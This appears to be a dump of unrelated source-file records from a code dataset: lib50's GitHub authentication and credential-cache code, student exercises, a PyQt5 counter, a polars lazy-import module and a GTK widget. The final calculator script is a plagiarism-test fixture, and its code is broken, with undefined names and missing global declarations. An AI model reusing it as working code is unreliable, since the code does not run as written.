Path(target_slug).parts[0:2]]\n if other_slugs_filtered:\n other_slugs = other_slugs_filtered\n\n scores = {}\n for other_slug in other_slugs:\n scores[other_slug] = jellyfish.jaro_winkler(target_slug, other_slug)\n\n return sorted(scores, key=lambda k: scores[k], reverse=True)\n\n\ndef check_dependencies():\n \"\"\"\n Check that dependencies are installed:\n - require git 2.7+, so that credential-cache--daemon ignores SIGHUP\n https://github.com/git/git/blob/v2.7.0/credential-cache--daemon.c\n \"\"\"\n\n # Check that git is installed\n if not shutil.which(\"git\"):\n raise Error(_(\"You don't have git. Install git, then re-run!\"))\n\n # Check that git --version > 2.7\n version = subprocess.check_output([\"git\", \"--version\"]).decode(\"utf-8\")\n matches = re.search(r\"^git version (\\d+\\.\\d+\\.\\d+).*$\", version)\n if not matches or pkg_resources.parse_version(matches.group(1)) < pkg_resources.parse_version(\"2.7.0\"):\n raise Error(_(\"You have an old version of git. Install version 2.7 or later, then re-run!\"))\n\n\ndef logout():\n _run(f\"git credential-cache --socket {_CREDENTIAL_SOCKET} exit\")\n\n\n@attr.s(slots=True)\nclass User:\n name = attr.ib()\n repo = attr.ib()\n org = attr.ib()\n email = attr.ib(default=attr.Factory(lambda self: f\"{self.name}@users.noreply.github.com\",\n takes_self=True),\n init=False)\n\n\nclass Git:\n cache = \"\"\n working_area = \"\"\n\n def __init__(self):\n self._args = []\n\n def set(self, git_arg, **format_args):\n \"\"\"git = Git().set(\"-C {folder}\", folder=\"foo\")\"\"\"\n format_args = {name: shlex.quote(arg) for name, arg in format_args.items()}\n git = Git()\n git._args = self._args[:]\n git._args.append(git_arg.format(**format_args))\n return git\n\n def __call__(self, command, **format_args):\n \"\"\"Git()(\"git clone {repo}\", repo=\"foo\")\"\"\"\n git = self.set(command, **format_args)\n\n git_command = f\"git {' '.join(git._args)}\"\n git_command = re.sub(' +', ' ', git_command)\n\n # Format to show in git info\n logged_command = git_command\n for opt in [Git.cache, Git.working_area]:\n logged_command = logged_command.replace(str(opt), \"\")\n logged_command = re.sub(' +', ' ', logged_command)\n\n # Log pretty command in info\n logger.info(termcolor.colored(logged_command, attrs=[\"bold\"]))\n\n return git_command\n\n\nclass Slug:\n def __init__(self, slug, offline=False):\n \"\"\"Parse /// from slug.\"\"\"\n self.slug = self.normalize_case(slug)\n self.offline = offline\n\n # Assert begin/end of slug are correct\n self._check_endings()\n\n # Find third \"/\" in identifier\n idx = self.slug.find(\"/\", self.slug.find(\"/\") + 1)\n if idx == -1:\n raise InvalidSlugError(_(\"Invalid slug\"))\n\n # Split slug in //\n remainder = self.slug[idx + 1:]\n self.org, self.repo = self.slug.split(\"/\")[:2]\n\n # Gather all branches\n try:\n branches = self._get_branches()\n except TimeoutError:\n if not offline:\n raise ConnectionError(\"Could not connect to GitHub, it seems you are offline.\")\n branches = []\n except Error:\n branches = []\n\n # Find a matching branch\n for branch in branches:\n if remainder.startswith(f\"{branch}\"):\n self.branch = branch\n self.problem = Path(remainder[len(branch) + 1:])\n break\n else:\n raise InvalidSlugError(_(\"Invalid slug: {}\".format(self.slug)))\n\n def _check_endings(self):\n \"\"\"Check begin/end of slug, raises Error if malformed.\"\"\"\n if self.slug.startswith(\"/\") and self.slug.endswith(\"/\"):\n raise InvalidSlugError(\n _(\"Invalid slug. Did you mean {}, without the leading and trailing slashes?\".format(self.slug.strip(\"/\"))))\n elif self.slug.startswith(\"/\"):\n raise InvalidSlugError(\n _(\"Invalid slug. Did you mean {}, without the leading slash?\".format(self.slug.strip(\"/\"))))\n elif self.slug.endswith(\"/\"):\n raise InvalidSlugError(\n _(\"Invalid slug. Did you mean {}, without the trailing slash?\".format(self.slug.strip(\"/\"))))\n\n def _get_branches(self):\n \"\"\"Get branches from org/repo.\"\"\"\n if self.offline:\n local_path = get_local_path() / self.org / self.repo\n output = _run(f\"git -C {shlex.quote(str(local_path))} show-ref --heads\").split(\"\\n\")\n else:\n cmd = f\"git ls-remote --heads https://github.com/{self.org}/{self.repo}\"\n try:\n with _spawn(cmd, timeout=3) as child:\n output = child.read().strip().split(\"\\r\\n\")\n except pexpect.TIMEOUT:\n if \"Username for\" in child.buffer:\n return []\n else:\n raise TimeoutError(3)\n\n # Parse get_refs output for the actual branch names\n return (line.split()[1].replace(\"refs/heads/\", \"\") for line in output)\n\n @staticmethod\n def normalize_case(slug):\n parts = slug.split(\"/\")\n if len(parts) < 3:\n raise InvalidSlugError(_(\"Invalid slug\"))\n parts[0] = parts[0].lower()\n parts[1] = parts[1].lower()\n return \"/\".join(parts)\n\n\n def __str__(self):\n return self.slug\n\n\nclass ProgressBar:\n \"\"\"Show a progress bar starting with message.\"\"\"\n DISABLED = False\n TICKS_PER_SECOND = 2\n\n def __init__(self, message, output_stream=None):\n\n if output_stream is None:\n output_stream = sys.stderr\n\n self._message = message\n self._progressing = False\n self._thread = None\n self._print = functools.partial(print, file=output_stream)\n\n def stop(self):\n \"\"\"Stop the progress bar.\"\"\"\n if self._progressing:\n self._progressing = False\n self._thread.join()\n\n def __enter__(self):\n def progress_runner():\n self._print(f\"{self._message}...\", end=\"\", flush=True)\n while self._progressing:\n self._print(\".\", end=\"\", flush=True)\n time.sleep(1 / ProgressBar.TICKS_PER_SECOND if ProgressBar.TICKS_PER_SECOND else 0)\n self._print()\n\n if not ProgressBar.DISABLED:\n self._progressing = True\n self._thread = threading.Thread(target=progress_runner)\n self._thread.start()\n else:\n self._print(f\"{self._message}...\")\n\n return self\n\n def __exit__(self, exc_type, exc_val, exc_tb):\n self.stop()\n\n\nclass _StreamToLogger:\n \"\"\"Send all that enters the stream to log-function.\"\"\"\n\n def __init__(self, log):\n self._log = log\n\n def write(self, message):\n message = message.strip()\n if message:\n self._log(message)\n\n def flush(self):\n pass\n\n\n@contextlib.contextmanager\ndef _spawn(command, quiet=False, timeout=None):\n # Spawn command\n child = pexpect.spawn(\n command,\n encoding=\"utf-8\",\n env=dict(os.environ),\n timeout=timeout)\n\n try:\n if not quiet:\n # Log command output to logger\n child.logfile_read = _StreamToLogger(logger.debug)\n yield child\n except BaseException:\n child.close()\n raise\n else:\n if child.isalive():\n try:\n child.expect(pexpect.EOF, timeout=timeout)\n except pexpect.TIMEOUT:\n raise Error()\n child.close(force=True)\n if child.signalstatus is None and child.exitstatus != 0:\n logger.debug(\"{} exited with {}\".format(command, child.exitstatus))\n raise Error()\n\n\ndef _run(command, quiet=False, timeout=None):\n \"\"\"Run a command, returns command output.\"\"\"\n try:\n with _spawn(command, quiet, timeout) as child:\n command_output = child.read().strip().replace(\"\\r\\n\", \"\\n\")\n except pexpect.TIMEOUT:\n logger.info(f\"command {command} timed out\")\n raise TimeoutError(timeout)\n\n return command_output\n\n\ndef _glob(pattern, skip_dirs=False):\n \"\"\"Glob pattern, expand directories, return all files that matched.\"\"\"\n # Implicit recursive iff no / in pattern and starts with *\n if \"/\" not in pattern and pattern.startswith(\"*\"):\n files = glob.glob(f\"**/{pattern}\", recursive=True)\n else:\n files = glob.glob(pattern, recursive=True)\n\n # Expand dirs\n all_files = set()\n for file in files:\n if os.path.isdir(file) and not skip_dirs:\n all_files.update(set(f for f in _glob(f\"{file}/**/*\", skip_dirs=True) if not os.path.isdir(f)))\n else:\n all_files.add(file)\n\n # Normalize all files\n return {str(Path(f)) for f in all_files}\n\n\ndef _match_files(universe, pattern):\n # Implicit recursive iff no / in pattern and starts with *\n if \"/\" not in pattern and pattern.startswith(\"*\"):\n pattern = f\"**/{pattern}\"\n pattern = re.compile(fnmatch.translate(pattern))\n return set(file for file in universe if pattern.match(file))\n\n\ndef get_content(org, repo, branch, filepath):\n \"\"\"Get all content from org/repo/branch/filepath at GitHub.\"\"\"\n url = \"https://github.com/{}/{}/raw/{}/{}\".format(org, repo, branch, filepath)\n r = requests.get(url)\n if not r.ok:\n if r.status_code == 404:\n raise InvalidSlugError(_(\"Invalid slug. Did you mean to submit something else?\"))\n else:\n # Check if GitHub outage may be the source of the issue\n check_github_status()\n\n # Otherwise raise a ConnectionError\n raise ConnectionError(_(\"Could not connect to GitHub. Do make sure you are connected to the internet.\"))\n return r.content\n\n\ndef check_github_status():\n \"\"\"\n Pings the githubstatus API. Raises an Error if the Git Operations and/or\n API requests components show an increase in errors.\n \"\"\"\n\n # https://www.githubstatus.com/api\n status_result = requests.get(\"https://kctbh9vrtdwd.statuspage.io/api/v2/components.json\")\n\n # If status check failed\n if not status_result.ok:\n raise ConnectionError(_(\"Could not connect to GitHub. Do make sure you are connected to the internet.\"))\n\n # Get the components lib50 uses\n components = status_result.json()[\"components\"]\n relevant_components = [c for c in components if c[\"name\"] in (\"Git Operations\", \"API Requests\")]\n\n # If there is an indication of errors on GitHub's side\n for component in components:\n if component[\"status\"] != \"operational\":\n raise ConnectionError(_(f\"Could not connect to GitHub. It looks like GitHub is having some issues with {component['name']}. Do check on https://www.githubstatus.com and try again later.\"))\n\n\ndef _lfs_add(files, git):\n \"\"\"\n Add any oversized files with lfs.\n Throws error if a file is bigger than 2GB or git-lfs is not installed.\n \"\"\"\n # Check for large files > 100 MB (and huge files > 2 GB)\n # https://help.github.com/articles/conditions-for-large-files/\n # https://help.github.com/articles/about-git-large-file-storage/\n larges, huges = [], []\n for file in files:\n size = os.path.getsize(file)\n if size > (100 * 1024 * 1024):\n larges.append(file)\n elif size > (2 * 1024 * 1024 * 1024):\n huges.append(file)\n\n # Raise Error if a file is >2GB\n if huges:\n raise Error(_(\"These files are too large to be submitted:\\n{}\\n\"\n \"Remove these files from your directory \"\n \"and then re-run!\").format(\"\\n\".join(huges), org))\n\n # Add large files (>100MB) with git-lfs\n if larges:\n # Raise Error if git-lfs not installed\n if not shutil.which(\"git-lfs\"):\n raise Error(_(\"These files are too large to be submitted:\\n{}\\n\"\n \"Install git-lfs (or remove these files from your directory) \"\n \"and then re-run!\").format(\"\\n\".join(larges)))\n\n # Install git-lfs for this repo\n _run(git(\"lfs install --local\"))\n\n # For pre-push hook\n _run(git(\"config credential.helper cache\"))\n\n # Rm previously added file, have lfs track file, add file again\n for large in larges:\n _run(git(\"rm --cached {large}\", large=large))\n _run(git(\"lfs track {large}\", large=large))\n _run(git(\"add {large}\", large=large))\n _run(git(\"add --force .gitattributes\"))\n\n\ndef _authenticate_ssh(org, repo=None):\n \"\"\"Try authenticating via ssh, if succesful yields a User, otherwise raises Error.\"\"\"\n # Require ssh-agent\n child = pexpect.spawn(\"ssh -p443 -T git@ssh.github.com\", encoding=\"utf8\")\n # GitHub prints 'Hi {username}!...' when attempting to get shell access\n try:\n i = child.expect([\"Hi (.+)! You've successfully authenticated\",\n \"Enter passphrase for key\",\n \"Permission denied\",\n \"Are you sure you want to continue connecting\"])\n except pexpect.TIMEOUT:\n return None\n\n\n child.close()\n\n if i == 0:\n username = child.match.groups()[0]\n else:\n return None\n\n return User(name=username,\n repo=f\"ssh://git@ssh.github.com:443/{org}/{username if repo is None else repo}\",\n org=org)\n\n\n@contextlib.contextmanager\ndef _authenticate_https(org, repo=None):\n \"\"\"Try authenticating via HTTPS, if succesful yields User, otherwise raises Error.\"\"\"\n _CREDENTIAL_SOCKET.parent.mkdir(mode=0o700, exist_ok=True)\n try:\n Git.cache = f\"-c credential.helper= -c credential.helper='cache --socket {_CREDENTIAL_SOCKET}'\"\n git = Git().set(Git.cache)\n\n # Get credentials from cache if possible\n with _spawn(git(\"credential fill\"), quiet=True) as child:\n child.sendline(\"protocol=https\")\n child.sendline(\"host=github.com\")\n child.sendline(\"\")\n i = child.expect([\"Username for '.+'\", \"Password for '.+'\",\n \"username=([^\\r]+)\\r\\npassword=([^\\r]+)\\r\\n\"])\n if i == 2:\n username, password = child.match.groups()\n else:\n username = password = None\n child.close()\n child.exitstatus = 0\n\n\n if password is None:\n username = _prompt_username(_(\"GitHub username: \"))\n password = _prompt_password(_(\"GitHub password: \"))\n\n # Check if credentials are correct\n res = requests.get(\"https://api.github.com/user\", auth=(username, password.encode('utf8')))\n\n # Check for 2-factor authentication https://developer.github.com/v3/auth/#working-with-two-factor-authentication\n if \"X-GitHub-OTP\" in res.headers:\n raise Error(\"Looks like you have two-factor authentication enabled!\"\n \" Please generate a personal access token (with GitHub's `repo` scope) and use it as your password.\"\n \" See https://help.github.com/articles/creating-a-personal-access-token-for-the-command-line for more info.\")\n\n if res.status_code != 200:\n logger.info(res.headers)\n logger.info(res.text)\n raise Error(_(\"Invalid username and/or password.\") if res.status_code ==\n 401 else _(\"Could not authenticate user.\"))\n\n # Canonicalize (capitalization of) username,\n # Especially if user logged in via email address\n username = res.json()[\"login\"]\n\n # Credentials are correct, best cache them\n with _spawn(git(\"-c credentialcache.ignoresighup=true credential approve\"), quiet=True) as child:\n child.sendline(\"protocol=https\")\n child.sendline(\"host=github.com\")\n child.sendline(f\"path={org}/{username}\")\n child.sendline(f\"username={username}\")\n child.sendline(f\"password={password}\")\n child.sendline(\"\")\n\n yield User(name=username,\n repo=f\"https://{username}@github.com/{org}/{username if repo is None else repo}\",\n org=org)\n except BaseException:\n # Some error occured while this context manager is active, best forget credentials.\n logout()\n raise\n\n\ndef _prompt_username(prompt=\"Username: \"):\n \"\"\"Prompt the user for username.\"\"\"\n try:\n username = input(prompt).strip()\n while not username:\n print(\"Username cannot be empty, please try again.\")\n username = input(prompt).strip()\n return username\n except EOFError:\n print()\n\n\ndef _prompt_password(prompt=\"Password: \"):\n \"\"\"Prompt the user for password, printing asterisks for each character\"\"\"\n print(prompt, end=\"\", flush=True)\n password_bytes = []\n password_string = \"\"\n\n with _no_echo_stdin():\n while True:\n # Read one byte\n ch = sys.stdin.buffer.read(1)[0]\n # If user presses Enter or ctrl-d\n if ch in (ord(\"\\r\"), ord(\"\\n\"), 4):\n print(\"\\r\")\n break\n # Del\n elif ch == 127:\n if len(password_string) > 0:\n print(\"\\b \\b\", end=\"\", flush=True)\n # Remove last char and its corresponding bytes\n password_string = password_string[:-1]\n password_bytes = list(password_string.encode(\"utf8\"))\n # Ctrl-c\n elif ch == 3:\n print(\"^C\", end=\"\", flush=True)\n raise KeyboardInterrupt\n else:\n password_bytes.append(ch)\n\n # If byte added concludes a utf8 char, print *\n try:\n password_string = bytes(password_bytes).decode(\"utf8\")\n except UnicodeDecodeError:\n pass\n else:\n print(\"*\", end=\"\", flush=True)\n\n if not password_string:\n print(\"Password cannot be empty, please try again.\")\n return _prompt_password(prompt)\n\n return password_string\n\n\n@contextlib.contextmanager\ndef _no_echo_stdin():\n \"\"\"\n On Unix only, have stdin not echo input.\n https://stackoverflow.com/questions/510357/python-read-a-single-character-from-the-user\n \"\"\"\n fd = sys.stdin.fileno()\n old_settings = termios.tcgetattr(fd)\n tty.setraw(fd)\n try:\n yield\n finally:\n termios.tcsetattr(fd, termios.TCSADRAIN, old_settings)\n","sub_path":"myenv/lib/python3.7/site-packages/lib50/_api.py","file_name":"_api.py","file_ext":"py","file_size_in_byte":32982,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"262555964","text":"'''(https://classes.cs.uoregon.edu/19F/cis210/p31-fizzbuzz-F19.pdf)\r\nProject 3.1: Fizzbuzz\r\nCIS 210 F19\r\n\r\nAuthor: Erich Scheid\r\n\r\nCredit: N/A\r\n\r\nDesc.: Write a program that follows the rules of fizzbuzz (if %3 is\r\n 0 print 'fizz', if %5 is 0 print 'buzz', if %3 is 0 and %5 is 0\r\n print 'fizzbuzz', otherwise print the index).\r\n'''\r\ndef fb(n):\r\n '''(int) -> printed string(s)\r\n\r\n Takes an integer(n) and makes a list from one to n that\r\n follows the rules of fizzbuzz (if %3 is 0 print 'fizz',\r\n if %5 is print 'buzz', if %3 is 0 and %5 is 0 print 'fizzbuzz',\r\n otherwise print the index).\r\n\r\n >>> fb(5) | >>> fb(15) [starting at line 11]\r\n 1 | 11\r\n 2 | fizz\r\n fizz | 13\r\n 4 | 14\r\n buzz | fizzbuzz\r\n Game over! | Game over!\r\n '''\r\n for i in range(1, n + 1):\r\n output = ''\r\n \r\n if not i % 3:\r\n output = 'fizz'\r\n if not i % 5:\r\n output += 'buzz'\r\n if not output:\r\n output = i\r\n \r\n print(output)\r\n print('Game over!')\r\n return None\r\n","sub_path":"Week3/p31_fizzbuzz.py","file_name":"p31_fizzbuzz.py","file_ext":"py","file_size_in_byte":1177,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"570286635","text":"import csv\nimport re\n\nimport digital_land\n\n\nclass HarmoniserPlugin:\n organisation_uri = {}\n end_of_uri_regex = re.compile(r\".*/\")\n\n @digital_land.hookimpl\n def init_harmoniser_plugin(self, harmoniser):\n self.harmoniser = harmoniser\n\n for row in csv.DictReader(open(\"var/cache/organisation.csv\", newline=\"\")):\n if \"opendatacommunities\" in row:\n uri = row[\"opendatacommunities\"].lower()\n self.organisation_uri[row[\"organisation\"].lower()] = uri\n self.organisation_uri[uri] = uri\n self.organisation_uri[self.end_of_uri(uri)] = uri\n self.organisation_uri[row[\"statistical-geography\"].lower()] = uri\n if \"local-authority-eng\" in row[\"organisation\"]:\n dl_url = \"https://digital-land.github.io/organisation/%s/\" % (\n row[\"organisation\"]\n )\n dl_url = dl_url.lower().replace(\"-eng:\", \"-eng/\")\n self.organisation_uri[dl_url] = uri\n\n self.organisation_uri.pop(\"\")\n\n @digital_land.hookimpl\n def apply_patch_post(self, fieldname, value):\n if fieldname == \"OrganisationURI\":\n normalised_value = self.lower_uri(value)\n\n if normalised_value in self.organisation_uri:\n return self.organisation_uri[normalised_value]\n\n s = self.end_of_uri(normalised_value)\n if s in self.organisation_uri:\n return self.organisation_uri[s]\n\n self.harmoniser.log_issue(\n fieldname, \"opendatacommunities-uri\", normalised_value\n )\n return value\n\n @digital_land.hookimpl\n def set_resource_defaults_post(self):\n if \"entry-date\" in self.harmoniser.default_values:\n self.harmoniser.default_values[\n \"LastUpdatedDate\"\n ] = self.harmoniser.default_values[\"entry-date\"]\n\n if \"organisation\" in self.harmoniser.default_values:\n key = self.harmoniser.default_values[\"organisation\"].lower()\n if key in self.organisation_uri:\n self.harmoniser.default_values[\"OrganisationURI\"] = self.organisation_uri[key]\n\n def lower_uri(self, value):\n return \"\".join(value.split()).lower()\n\n def end_of_uri(self, value):\n return self.end_of_uri_regex.sub(\"\", value.rstrip(\"/\").lower())\n\n\n# regsiter plugin instances, not the classes themselves\nharmoniser_plugin = HarmoniserPlugin()\n","sub_path":"pipeline/plugins.py","file_name":"plugins.py","file_ext":"py","file_size_in_byte":2495,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"367511437","text":"def biggest(*num):\n h = 0\n for c in num:\n if c > h:\n h = c\n print(f'In {num} {[len(num)]} the largest number is: {h}')\n\n\nbiggest(2, 9, 4, 7, 1)\nbiggest(4, 7, 0)\nbiggest(1, 2)\nbiggest(6)\nbiggest()\n\n\n\n\n","sub_path":"exercicosPython/exercises/ex001_114/ex099largest.py","file_name":"ex099largest.py","file_ext":"py","file_size_in_byte":227,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"107915367","text":"import sys\nfrom PyQt5 import QtWidgets\n\nclass Pencere(QtWidgets.QWidget):\n def __init__(self):\n super().__init__()\n self.init_ui()\n def init_ui(self):\n self.yazi_alani=QtWidgets.QLabel(\"Bana Henüz Tıklanmadı\")\n self.button=QtWidgets.QPushButton(\"Bana Tıkla\")\n self.say=0\n\n v_box=QtWidgets.QVBoxLayout()\n\n v_box.addWidget(self.button)\n v_box.addWidget(self.yazi_alani)\n v_box.addStretch()\n\n h_box = QtWidgets.QHBoxLayout()\n\n h_box.addStretch()\n h_box.addLayout(v_box)\n h_box.addStretch()\n self.setLayout(h_box)\n\n self.button.clicked.connect(self.click)\n self.show()\n def click(self):\n self.say+=1\n self.yazi_alani.setText(\"Bana \"+str(self.say)+\" Defa Tıklandı\")\n\napp = QtWidgets.QApplication(sys.argv)\n\npencere=Pencere()\nsys.exit(app.exec_())","sub_path":"PyQt5/Fonksiyonel Buton.py","file_name":"Fonksiyonel Buton.py","file_ext":"py","file_size_in_byte":882,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"568291146","text":"from __future__ import annotations\n\nimport inspect\nimport re\nimport sys\nfrom importlib import import_module\nfrom importlib.util import find_spec\nfrom types import ModuleType\nfrom typing import TYPE_CHECKING, Any\n\n_FSSPEC_AVAILABLE = True\n_NUMPY_AVAILABLE = True\n_PANDAS_AVAILABLE = True\n_PYARROW_AVAILABLE = True\n_ZONEINFO_AVAILABLE = True\n_HYPOTHESIS_AVAILABLE = True\n_DELTALAKE_AVAILABLE = True\n\n\nclass _LazyModule(ModuleType):\n \"\"\"\n Module that can act both as a lazy-loader and as a proxy.\n\n Notes\n -----\n We do NOT register this module with `sys.modules` so as not to cause\n confusion in the global environment. This way we have a valid proxy\n module for our own use, but it lives _exclusively_ within polars.\n\n \"\"\"\n\n _mod_pfx: dict[str, str] = {\n \"numpy\": \"np.\",\n \"pandas\": \"pd.\",\n \"pyarrow\": \"pa.\",\n }\n\n def __init__(\n self,\n module_name: str,\n module_available: bool,\n ) -> None:\n \"\"\"\n Initialise lazy-loading proxy module.\n\n Parameters\n ----------\n module_name : str\n the name of the module to lazy-load (if available).\n\n module_available : bool\n indicate if the referenced module is actually available (we will proxy it\n in both cases, but raise a helpful error when invoked if it doesn't exist).\n\n \"\"\"\n self._module_available = module_available\n self._module_name = module_name\n self._globals = globals()\n super().__init__(module_name)\n\n def _import(self) -> ModuleType:\n # import the referenced module, replacing the proxy in this module's globals\n module = import_module(self.__name__)\n self._globals[self._module_name] = module\n self.__dict__.update(module.__dict__)\n return module\n\n def __getattr__(self, attr: Any) -> Any:\n # have \"hasattr('__wrapped__')\" return False without triggering import\n # (it's for decorators, not modules, but keeps \"make doctest\" happy)\n if attr == \"__wrapped__\":\n raise AttributeError(\n f\"{self._module_name!r} object has no attribute {attr!r}\"\n )\n\n # accessing the proxy module's attributes triggers import of the real thing\n if self._module_available:\n # import the module and return the requested attribute\n module = self._import()\n return getattr(module, attr)\n else:\n # user has not installed the proxied module\n if re.match(r\"^__\\w+__$\", attr):\n # allow some minimal introspection on private module\n # attrs to avoid unnecessary error-handling elsewhere\n return None\n\n # all other attribute access raises a helpful exception\n pfx = self._mod_pfx.get(self._module_name, \"\")\n raise ModuleNotFoundError(\n f\"{pfx}{attr} requires '{self._module_name}' module to be installed\"\n ) from None\n\n\ndef _lazy_import(module_name: str) -> tuple[ModuleType, bool]:\n \"\"\"\n Lazy import the given module; avoids up-front import costs.\n\n Parameters\n ----------\n module_name : str\n name of the module to import, eg: \"pyarrow\".\n\n Notes\n -----\n If the requested module is not available (eg: has not been installed), a proxy\n module is created in its place, which raises an exception on any attribute\n access. This allows for import and use as normal, without requiring explicit\n guard conditions - if the module is never used, no exception occurs; if it\n is, then a helpful exception is raised.\n\n Returns\n -------\n tuple[Module, bool]: a lazy-loading module and a boolean indicating if the\n requested/underlying module exists (if not, the returned module is a proxy).\n\n \"\"\"\n # check if module is LOADED\n if module_name in sys.modules:\n return sys.modules[module_name], True\n\n # check if module is AVAILABLE\n try:\n module_spec = find_spec(module_name)\n module_available = not (module_spec is None or module_spec.loader is None)\n except ModuleNotFoundError:\n module_available = False\n\n # create lazy/proxy module that imports the real one on first use\n # (or raises an explanatory ModuleNotFoundError if not available)\n return (\n _LazyModule(\n module_name=module_name,\n module_available=module_available,\n ),\n module_available,\n )\n\n\nif TYPE_CHECKING:\n import deltalake\n import fsspec\n import hypothesis\n import numpy\n import pandas\n import pyarrow\n\n if sys.version_info >= (3, 9):\n import zoneinfo\n else:\n from backports import zoneinfo\nelse:\n fsspec, _FSSPEC_AVAILABLE = _lazy_import(\"fsspec\")\n numpy, _NUMPY_AVAILABLE = _lazy_import(\"numpy\")\n pandas, _PANDAS_AVAILABLE = _lazy_import(\"pandas\")\n pyarrow, _PYARROW_AVAILABLE = _lazy_import(\"pyarrow\")\n hypothesis, _HYPOTHESIS_AVAILABLE = _lazy_import(\"hypothesis\")\n deltalake, _DELTALAKE_AVAILABLE = _lazy_import(\"deltalake\")\n zoneinfo, _ZONEINFO_AVAILABLE = (\n _lazy_import(\"zoneinfo\")\n if sys.version_info >= (3, 9)\n else _lazy_import(\"backports.zoneinfo\")\n )\n\n\ndef _NUMPY_TYPE(obj: Any) -> bool:\n return _NUMPY_AVAILABLE and any(\n \"numpy.\" in str(o)\n for o in (obj if inspect.isclass(obj) else obj.__class__).mro()\n )\n\n\ndef _PANDAS_TYPE(obj: Any) -> bool:\n return _PANDAS_AVAILABLE and any(\n \"pandas.\" in str(o)\n for o in (obj if inspect.isclass(obj) else obj.__class__).mro()\n )\n\n\ndef _PYARROW_TYPE(obj: Any) -> bool:\n return _PYARROW_AVAILABLE and any(\n \"pyarrow.\" in str(o)\n for o in (obj if inspect.isclass(obj) else obj.__class__).mro()\n )\n\n\n__all__ = [\n \"fsspec\",\n \"numpy\",\n \"pandas\",\n \"pyarrow\",\n \"deltalake\",\n \"zoneinfo\",\n \"_LazyModule\",\n \"_FSSPEC_AVAILABLE\",\n \"_NUMPY_AVAILABLE\",\n \"_NUMPY_TYPE\",\n \"_PANDAS_AVAILABLE\",\n \"_PANDAS_TYPE\",\n \"_PYARROW_AVAILABLE\",\n \"_PYARROW_TYPE\",\n \"_ZONEINFO_AVAILABLE\",\n \"_HYPOTHESIS_AVAILABLE\",\n \"_DELTALAKE_AVAILABLE\",\n]\n","sub_path":"mds_py/mds-env/lib/python3.11/site-packages/polars/dependencies.py","file_name":"dependencies.py","file_ext":"py","file_size_in_byte":6157,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"112891479","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n#\n# =================================================\n# Trigger\n# - Author jouke hijlkema \n# - jeu. avril 13:53 2017\n# - Initial Version 1.0\n# =================================================\nfrom gi.repository import Gtk\nfrom .Counter import Counter\n\nclass tankDist(Counter):\n def __init__(self,parent,*args,**kw):\n \"docstring\"\n super(tankDist, self).__init__(parent,*args,**kw)\n self.parent = parent\n\n self.units = \"km\"\n self.update(0)\n self.Value.set_width_chars(4)\n self.Value.set_max_width_chars(4)\n\n self.reset = Gtk.Button.new_with_label(\"0\")\n self.reset.set_hexpand(True)\n self.add(self.reset)\n\n self.reset.connect(\"clicked\",self.myReset)\n\n ## --------------------------------------------------------------\n ## Description : chage the offset value\n ## NOTE : \n ## -\n ## Author : jouke hylkema\n ## date : 16-15-2017 12:15:52\n ## --------------------------------------------------------------\n def myReset (self,widget):\n dialog = Gtk.MessageDialog(self.parent, 0, Gtk.MessageType.WARNING,\n Gtk.ButtonsType.OK_CANCEL, \"Reset tank ?\")\n rep = dialog.run()\n if rep == Gtk.ResponseType.OK:\n self.returnSignal.send(\"reset\")\n dialog.destroy()\n","sub_path":"GUI/Parts/tankDist.py","file_name":"tankDist.py","file_ext":"py","file_size_in_byte":1403,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"64791877","text":"#this version is taken from a theoretical copier who may have cheated from #test2.py, it posseses slight variations\nimport math\nres = 0\nsumma = 0\ncalcor = 0.0\naverage = 0\ncalculatorrunning = True\ndef main():\n while (calculatorrunning):\n handleInput(Menu())\n print(\"Thanks for completing my program!\")\ndef menu():\n global result\n print(\"Current Result:\", result)\n print(\"\")\n print(\"Calculator Menu\")\n print(\"---------------\")\n print(\"0. Exit Program\")\n print(\"1. Addition\")\n print(\"2. Subtraction\")\n print(\"3. Multiplication\")\n print(\"4. Division\")\n print(\"5. Exponentiation\")\n print(\"6. Logarithm\")\n print(\"7. Display Average\")\n print(\"\")\n menuanswer = int(input('Enter Menu Selection: '))\n return menuanswer\n\ndef handleInput(menuanswer):\n global result\n global calculatorrunning\n global sum, calcs, average\n if (menuanswer == 0):\n calculatorrunning = False\n return\n elif (menuanswer >= 1 and menuanswer <= 6):\n op1, op2 = getInputs()\n if (menuanswer == 1):\n result = op1 + op2\n elif (menuanswer == 2):\n result = op1 - op2\n elif (menuanswer == 3):\n result = op1 * op2\n elif (menuanswer == 4):\n result = op1/op2\n elif (menuanswer == 5):\n result = op1**op2\n elif (menuanswer == 6):\n result = math.log(op2, op1)\n elif (menuanswer == 7):\n print(\"\")\n if (calcs == 0):\n print(\"error: No calculations yet to average!\")\n else:\n print(\"sum of calculations:\", sum)\n print(\"number of calculations:\", calcs)\n if (isinstance(sum, complex)):\n print(\"Average of calculations:\", sum/float(calcs))\n else:\n print(\"Average of calculations:\", round(sum/float(calcs), 2))\n print(\"\")\n handleInput(int(input('Enter Menu Selection: ')))\n return\n else:\n print(\"\")\n print(\"Error: Invalid selection!\")\n print(\"\")\n handleInput(int(input('Enter Menu Selection: ')))\n return\n calcor += 1\n summa += result\n print(\"\")\n\ndef getInputs():\n op1 = input(\"Enter first operand: \")\n op2 = input(\"Enter second operand: \")\n if (op1 == \"RESULT\"):\n op1 = result\n op1 = float(op1)\n if (op2 == \"RESULT\"):\n op2 = result\n op2 = float(op2)\n return op1, op2\n\nmain()","sub_path":"source/test_files/test2copier.py","file_name":"test2copier.py","file_ext":"py","file_size_in_byte":2432,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
